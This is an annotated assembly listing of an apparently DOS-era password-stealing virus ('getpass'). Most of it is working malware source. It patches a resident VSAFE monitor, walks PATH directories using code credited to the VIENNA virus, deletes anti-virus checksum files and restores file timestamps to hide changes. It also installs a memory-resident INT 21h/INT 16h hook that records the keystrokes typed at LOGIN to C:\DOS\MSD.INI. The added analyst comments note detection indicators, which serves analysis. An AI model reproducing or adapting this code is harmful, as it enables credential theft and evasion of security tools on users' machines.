📄 getpass!.asm
MOV WORD PTR[BP+OLDINT],BX ;Save it.
MOV WORD PTR[BP+OLDINT+2],ES;
MOV AH,25h ;Set new int 24 handler.
LEA DX,[BP+OFFSET NEWINT] ;DS:DX->new handler.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
; RINT24 - put the INT 24h vector back to the value kept in OLDINT.
; In:   BP = base used for every data reference in this file (set outside
;       this view; presumably the load-address delta).
; Out:  DS preserved; AX and DX are overwritten.
; The code directly above stores BX/ES into OLDINT and installs NEWINT, so
; this is the matching undo step.
RINT24: PUSH DS ;Save data segment (LDS below replaces it).
MOV AX,2524h ;AH=25h set vector, AL=24h (DOS critical-error handler).
LDS DX,[BP+OFFSET OLDINT] ;DS:DX = saved original handler.
INT 21h ;Call DOS.
POP DS ;Restore data segment.
RET ;Return to caller.
;-----------------------------------------------------------------------------
; VSAFE - anti-antivirus step: conditionally patches one word in the code
; that currently owns INT 16h.
; Flow: AX=3516h returns the INT 16h vector in ES:BX; it is saved to NINT16,
; then the word at ES:BX+0364h is compared with 0945h and, only on a match,
; overwritten with 086Dh. Any other value leaves memory untouched.
; Analyst note: the label and the "No Vsafe" remark suggest the target is a
; resident VSAFE monitor; what the patched word controls is not visible in
; this listing. A resident monitor that verifies its own code would see
; this write.
VSAFE: MOV AX,3516h ;Get interrupt vector INT 16.
INT 21h ;(Now we know in which segment it is.)
MOV WORD PTR[BP+OFFSET NINT16],BX; - Store old INT 16 offset (author: "in TSR").
MOV WORD PTR[BP+OFFSET NINT16+2],ES;/  and its segment.
ADD BX,0364h ;Author: the jump to be changed lives at this offset.
CMP WORD PTR[ES:BX],0945h ;Is the expected original word there?
JNE OK_9 ;No, already modified or not resident.
MOV WORD PTR[ES:BX],086Dh ;Yes, overwrite it.
OK_9: RET ;Return to caller. No Vsafe.
;-----------------------------------------------------------------------------
; FIND1 / FIND2 - pick a directory out of the PATH= environment variable
; and copy it to NEW_DTA+50 as a NUL-terminated string.
; FIND1 presets VAL_2 to 0FFh and BX to 1; FIND2 is a second entry that
; uses whatever VAL_2 and BX already hold.
; In:   DS:2Ch = environment segment (PSP field), BP = data base register.
; Out:  directory text at [BP+OFFSET NEW_DTA+50]; BX incremented once per
;       ';' separator stepped over.
; Author's note: derived from the VIENNA virus.
; Analyst note: this is the directory-selection step of a PATH-walking
; file infector; the result is consumed by code outside this view.
FIND1: MOV BYTE PTR[BP+OFFSET VAL_2],0FFh; This routine is derived from
MOV BX,01h ; the VIENNA virus.
FIND2: PUSH ES ;- Save registers.
PUSH DS ;/
MOV ES,DS:2CH ;ES = environment segment taken from the PSP.
MOV DI,0 ;ES:DI points to environment.
FPATH: LEA SI,[BP+OFFSET PATH] ;Point to "PATH=" string in data area.
LODSB ;AL = first character of the pattern.
MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long.
REPNZ SCASB ;Search for first character.
MOV CX,4 ;Check the remaining four characters
LOOP_2: LODSB ;of the pattern
SCASB ;against the environment.
JNZ FPATH ;If not all there, abort & start over.
LOOP LOOP_2 ;Loop to check the next character.
XCHG SI,DI ;SI now indexes the text after "PATH=".
MOV CL,BYTE PTR[BP+OFFSET VAL_2];CL = VAL_2, the entry count for LOOP below.
PUSH ES ;\
POP DS ;-) DS = environment segment, ES = the DS saved above.
POP ES ;/
OK_14: LEA DI,[BP+OFFSET NEW_DTA+50];Destination; rewound for every entry.
OK_10: MOVSB ;Copy one character of the directory name.
MOV AL,[SI] ;Peek at the next character.
CMP AL,0 ;Is it at the end?
JE OK_11 ;Yes, keep what has been copied.
CMP AL,3Bh ;Is it ';'?
JNE OK_10 ;Nope, next letter.
INC SI ;Step past the ';' separator.
INC BX ;Count the entry.
LOOP OK_14 ;Next entry until CX reaches 0.
OK_11: POP DS ;Pops the value pushed from ES at FIND2 into DS.
MOV AL,0 ;Terminate the copied directory with a NUL byte.
MOV [DI],AL ;
RET ;Return to caller.
;-----------------------------------------------------------------------------
; DELSTUF - look for three anti-virus data files and delete each one found.
; The file specs are the strings at MICRO, TBAV and CENTRAL; the author's
; comments name them CHKLIST.MS, ANTI-VIR.DAT and CHKLIST.CPS.
; A counter (1..3) is kept on the stack across the DOS calls and decides
; which spec is tried next after the shared INTER/NODEL tail.
; In:   BP = data base register. Out: nothing; AX, BX, CX, DX overwritten.
; Analyst note: these are integrity/checksum databases of DOS-era scanners.
; Their unexplained disappearance from a directory is a useful indicator
; that this code (or a relative) has run there.
DELSTUF:MOV BX,01h ;Set counter
PUSH BX ;and push it.
LEA DX,[BP+OFFSET MICRO] ;Is there a CHKLIST.MS file?
JMP INTER ;Check it out.
SECOND: LEA DX,[BP+OFFSET TBAV] ;Is there a ANTI-VIR.DAT file?
INC BX ;Increase counter
PUSH BX ;and push it.
JMP INTER ;Check it out.
THIRD: LEA DX,[BP+OFFSET CENTRAL] ;Is there a CHKLIST.CPS file?
INC BX ;Increase counter
PUSH BX ;and push it
INTER: MOV AH,4Eh ;Find first matching entry.
MOV CX,110b ;Attribute mask: hidden + system files included.
INT 21h ;Call DOS.
JC NODEL ;No match, find next.
CALL ATTRIB ;Author: clear attributes (routine is outside this view).
MOV AH,41h ;Delete file.
INT 21h ;Call DOS.
NODEL: POP BX ;Pop counter.
CMP BX,01 ;Had the first one?
JE SECOND ;Yes, do the second.
CMP BX,02 ;Was it the second?
JE THIRD ;Yes, do the third.
RET ;Finished, return to caller.
;-----------------------------------------------------------------------------
; CHDRIVE - make the drive named by the first byte at NEW_DTA+50 the
; current DOS drive.
; The loop counts from 'A' upward until BL equals that byte, so CX ends as
; the zero-based drive number (A=0, B=1, ...), which INT 21h AH=0Eh expects
; in DL.
; In:   BP = data base register; NEW_DTA+50 holds a path starting with a
;       drive letter (presumably the directory FIND1/FIND2 copied there).
; Out:  nothing; AX, BX, CX, DX overwritten.
CHDRIVE:MOV CX,0FFFFh ;CX = -1 so the first INC below yields 0.
MOV BL,'A'-1 ;BL = 40h, one below 'A'.
OK_15: INC BL ;First pass: BL = 41h = 'A'.
INC CX ;First pass: CX = 0.
CMP BL,BYTE PTR[BP+OFFSET NEW_DTA+50];New drive letter.
JNE OK_15 ;Not the same, go again.
MOV DL,CL ;DL = calculated drive code.
MOV AH,0Eh ;Select default drive.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
; RTIME - write the time and date saved by STIME back onto a file.
; In:   TIME/DATE words filled by STIME; BX is not loaded here, so the
;       file handle is presumably still in BX from the caller - verify.
; Out:  nothing; AX, CX, DX overwritten.
; Analyst note: restoring the original timestamp hides a modification from
; a plain directory listing; compare content hashes, not dates.
RTIME: MOV AX,5701h ;AH=57h, AL=01h: set file date & time.
MOV CX,WORD PTR[BP+OFFSET TIME];Old time.
MOV DX,WORD PTR[BP+OFFSET DATE];Old date.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
; STIME - read a file's time and date and keep them in TIME/DATE so that
; RTIME can put them back later.
; In:   HANDLE = open file handle, BP = data base register.
; Out:  TIME and DATE updated; AX, BX, CX, DX overwritten.
STIME: MOV AX,5700h ;AH=57h, AL=00h: get file date & time.
MOV BX,[BP+OFFSET HANDLE] ;File Handle.
INT 21h ;Call DOS.
MOV WORD PTR[BP+OFFSET TIME],CX;Store time.
MOV WORD PTR[BP+OFFSET DATE],DX;Store date.
RET ;Return to caller.
;-----------------------------------------------------------------------------
; BPOINT - seek a file handle with offset 0 and origin code 02h.
; AX=4202h is the DOS seek call with AL=02h, i.e. relative to the end of
; the file, so with CX:DX = 0 the pointer lands at end-of-file (the
; original comment said "top").
; In:   BX is not loaded here; the handle is presumably set by the caller.
; Out:  whatever INT 21h AH=42h returns; AX, CX, DX overwritten.
BPOINT: XOR DX,DX ;Low word of offset = 0.
MOV AX,4202h ;Seek, origin = end of file.
XOR CX,CX ;High word of offset = 0.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
; ACTIVE - install the resident part, once, if an environment check passes.
; Steps visible here:
;   1. INT 17h, continue only when AH comes back as 01h (author: NETX
;      check; AH is not loaded beforehand in this routine).
;   2. CALL CREATE and CALL TIMER (both outside this view).
;   3. Residency probe: INT 21h with AX=3D3Dh; a reply of AX=1111h means
;      the INT21 handler below is already hooked, so nothing is installed.
;   4. Copy TSRLEN bytes starting at TSR to 0044:0100 (linear 00540h).
;   5. Copy the current INT 21h vector from 0000:0084 into the resident
;      copy at 0100h+NINTOF.
;   6. Point INT 21h at 0044:0100h+INTOF and INT 16h at 0044:0100h+INT16L.
; In:   BP = data base register. Out: DS preserved.
; Analyst note (indicators taken from this listing): INT 21h or INT 16h
; vectors whose segment is 0044h, and an INT 21h AX=3D3Dh call that
; returns AX=1111h.
ACTIVE: PUSH DS ;Save register.
INT 17h ;Author: check for NETX.
CMP AH,01h ;NETX resident?
JNE RESID ;Nope, do not install TSR.
CALL CREATE ;If it does not exist, create password file.
CALL TIMER ;Time to print the password file?
MOV AX,3D3Dh ;Do resident check.
INT 21h ;Call DOS.
CMP AX,1111h ;Already resident?
JE RESID ;If so, exit.
MOV AX,0044h ;Move code into hole in system
MOV ES,AX ;memory.
MOV DI,0100h ;ES:DI = 0044:0100
LEA SI,[BP+OFFSET TSR] ;Begin here
MOV CX,TSRLEN ;and this many bytes.
REP MOVSB ;Do it.
MOV DS,CX ;CX is 0 after REP: DS = 0000, the vector table.
MOV SI,0084h ;DS:SI = 0000:0084, the INT 21 vector.
MOV DI,0100h+NINTOF ;Store it in TSR
MOVSW ;One word,
MOVSW ;and another.
PUSH ES ;DS = ES = 0044h
POP DS ;for the two set-vector calls.
MOV AX,2521h ;Set new INT 21 vector.
MOV DX,0100h+INTOF ;Offset new INT 21.
INT 21h ;Call DOS.
MOV AX,2516h ;Set new INT 16 vector.
MOV DX,0100h+INT16L ;Offset new INT 16.
INT 21h ;Call DOS.
RESID: POP DS ;- Restore register.
RET ;Return to caller.
;-----------------------------------------------------------------------------
; TSR - first byte of the image that ACTIVE copies to 0044:0100 (source is
; [BP+OFFSET TSR], length TSRLEN). Everything from here on runs from that
; copy, which is why the handlers address their data as CS:[0100+...].
TSR: DB 0 ; This is THE cool part!
;-----------------------------------------------------------------------------
; INT21 - resident INT 21h hook.
;   AX=3D3Dh : residency probe, answered with AX=1111h and IRET.
;   AX=4B00h : program execution; the file name at DS:DX is examined.
;   other    : passed straight to the vector stored at 0100+NINTOF.
; For AX=4B00h the code scans forward to the first '.', steps back five
; bytes and compares them with the reference string read through
; CS:[0100+LOGINL] (presumably the LOGIN string below as seen in the
; resident copy). A match continues at GETPASS, anything else at ENDPARS;
; both end by chaining to the original INT 21h.
; In:   AX = DOS function, DS:DX = ASCIZ program name, ES:BX = EXEC
;       parameter block (used by GETPASS).
; Note: SI is zeroed and AL overwritten on the 4B00h path without being
;       saved by the pushes at OK_16.
; Analyst note (indicators taken from this listing): capture only arms when
; a program named LOGIN is executed, and the capture file is
; C:\DOS\MSD.INI.
INT21: CMP AX,4B00h ;Execute?
JE OK_16 ;Yep, do IT !
CMP AX,3D3Dh ;Resident check?
JNE DO_OLDI ;Nope, do original INT 21.
MOV AX,1111h ;Return the resident FLAG.
IRET ;Return to viral code.
DO_OLDI:JMP DWORD PTR CS:[0100+NINTOF];Do the original INT 21.
OK_16: PUSH BX ;\
PUSH CX ; \
PUSH DX ; ) Save registers.
PUSH DS ; /
PUSH ES ;/
MOV SI,0 ;SI = index into the compared name.
MOV BX,DX ;Name pointer into BX.
HERE: CMP BYTE PTR[BX],'.' ;Is it a point?
JE FOLLOW ;Yes, collected the name, cont.
INC BX ;BX+1
JMP HERE ;Get next character.
FOLLOW: SUB BX,05h ;Because LOGIN is 5 characters.
THERE: MOV AL,BYTE PTR [CS:0100+LOGINL+SI];Char into AL.
CMP BYTE PTR[BX+SI],'.' ;Did we make it until the point?
JE GETPASS ;It is LOGIN, get the password!
XOR AL,DS:[BX+SI] ;(XOR LOGIN,LOGIN)
JZ FOLLOW1 ;If XOR = 0 we have an equal char.
JMP ISNOT ;If not, well execute and do nothing.
FOLLOW1:INC SI ;Next char.
JMP THERE ;And compare again. (we must be sure.)
ISNOT: JMP ENDPARS ;Not LOGIN: restore registers and chain on.
LOGIN DB 'LOGIN',0 ;Used to compare.
KBFLAG DB 0 ;Keyboard interrupt activation flag.
FNAME DB 'C:\DOS\MSD.INI',0 ;Password file specification.
KEYPTR DW 0 ;Keyboard pointer.
CCOUNT DB 0 ;\
CRETURN DB 0 ;/ Carriage return counter.
;-----------------------------------------------------------------------------
; GETPASS - reached from INT21 when the executed program name matched.
; Arms the INT 16h hook (KFLAG = 0FFh) and primes the capture buffer from
; the command tail of the program being started.
;   - Registers are popped and pushed again so ES:BX is once more the EXEC
;     parameter block; the dword at ES:[BX+2] is the command-tail pointer.
;   - CL = tail length byte. Greater than 10h (signed compare): nothing is
;     copied. Zero: COUCR = 2. Otherwise COUCR = 1, KPTR = length+1, and
;     the tail (from its third byte on) is copied to KBUFF followed by
;     CR, LF.
;   - COUCR is the number of <Return> keys the INT 16h hook still counts;
;     presumably 2 = name and password are typed, 1 = name was on the
;     command line and only the password follows.
; ENDPARS restores the caller's registers, reloads AX=4B00h and jumps to
; the original INT 21h, so the program starts normally.
; Analyst note: the user sees no difference; detection has to come from the
; hooked vectors or from the capture file, not from program behaviour.
GETPASS:MOV BYTE PTR[CS:0100+KFLAG],0FFh;Set interrupt 16 flag.
POP ES ;\
POP DS ; \
POP DX ; ) Restore registers.
POP CX ; /
POP BX ;/
PUSH BX ;\
PUSH CX ; \
PUSH DX ; ) Save registers.
PUSH DS ; /
PUSH ES ;/
MOV DS,ES:[BX+04] ;\ Get param.pointer DS:SI
MOV SI,ES:[BX+02] ;/
PUSH CS ; \
POP ES ; ) Get keybuff pointer ES:DI
MOV DI,OFFSET[CS:0100+KBUFF]; /
XOR CX,CX ;Clear CX before loading the length byte.
MOV CL,BYTE PTR DS:[SI] ;CX IS PARAM.LEN.
INC SI ;Skip the length byte
INC SI ;and the byte after it.
CMP CL,10h ;Tail longer than 10h?
JG ENDPARS ;Yes (signed compare): capture nothing from it.
CMP CL,00h ;No parameters.
JE BRANCH ;
MOV BYTE PTR[CS:0100+COUCR],01h;One <Return> left to count.
ENDFD: INC CX ;
MOV WORD PTR[CS:0100+KPTR],CX;Set keyb. index to param. length + 1.
DEC CX ;
REPNZ MOVSB ;Copy CX bytes of the tail into KBUFF.
MOV BYTE PTR ES:[DI-1],CR ;Overwrite the last copied byte with CR
MOV BYTE PTR ES:[DI],LF ;and append LF.
JMP ENDPARS ;
BRANCH: MOV BYTE PTR[CS:0100+COUCR],02h;Two <Return>s left to count.
ENDPARS:POP ES ;\
POP DS ; \
POP DX ; ) Restore registers.
POP CX ; /
POP BX ;/
MOV AX,4B00h ;Reload the EXEC function code.
JMP DWORD PTR CS:[0100+NINTOF];Do the original INT 21.
PARAM DB 0 ;
;-----------------------------------------------------------------------------
INT16: CMP BYTE PTR[CS:0100+KFLAG],0FFh;Is it login.?
JE NEXTCHK ; Yes! Get the password!
THE_END:JMP DWORD PTR[CS:0100+OLD16L];Nope, do old INT 16.
NEXTCHK:CMP AH,00h ; Keyboard funtion call?
JE TAKCHAR ; Yes, continue.
CMP AH,10h ; Keyboard function call?
JNE THE_END ;
TAKCHAR:PUSHF ;Push flag register.
CALL DWORD PTR[CS:0100+OLD16L];Call old INT 16.
PUSH DS ;\
PUSH CS ; \
POP DS ; \
PUSH AX ; ) Save regs and set DS
PUSH BX ; /
PUSH CX ; /
PUSH DX ;/
CMP AL,00H ; No key typed
JE RESREGS ;
MOV BX,WORD PTR[CS:0100+KPTR]; Keybuf index
CMP BX,001Bh ; Max. length of kbuff.
JGE RESREGS ; End int16
CMP AL,CR ; If key = <Return>
JE COUNTCR ;
BACK: MOV BYTE PTR[CS:0100+KBUFF+BX],AL; Copy char into KBuffer
INC BX ;
MOV WORD PTR[CS:0100+KPTR],BX;
RESREGS:POP DX ;\
POP CX ; \
POP BX ; ) Restore regs.
POP AX ; /
POP DS ;/
IRET ; Return
COUNTCR:MOV AL,LF ;Line feed into AL.
DEC BYTE PTR[CS:0100+COUCR] ;Decrease CR counter.
CMP BYTE PTR[CS:0100+COUCR],00h;Is it zero?
JE OVER_2 ;Nope, continue logging.
MOV BYTE PTR[CS:0100+KBUFF+BX],CR; Copy char into KBuffer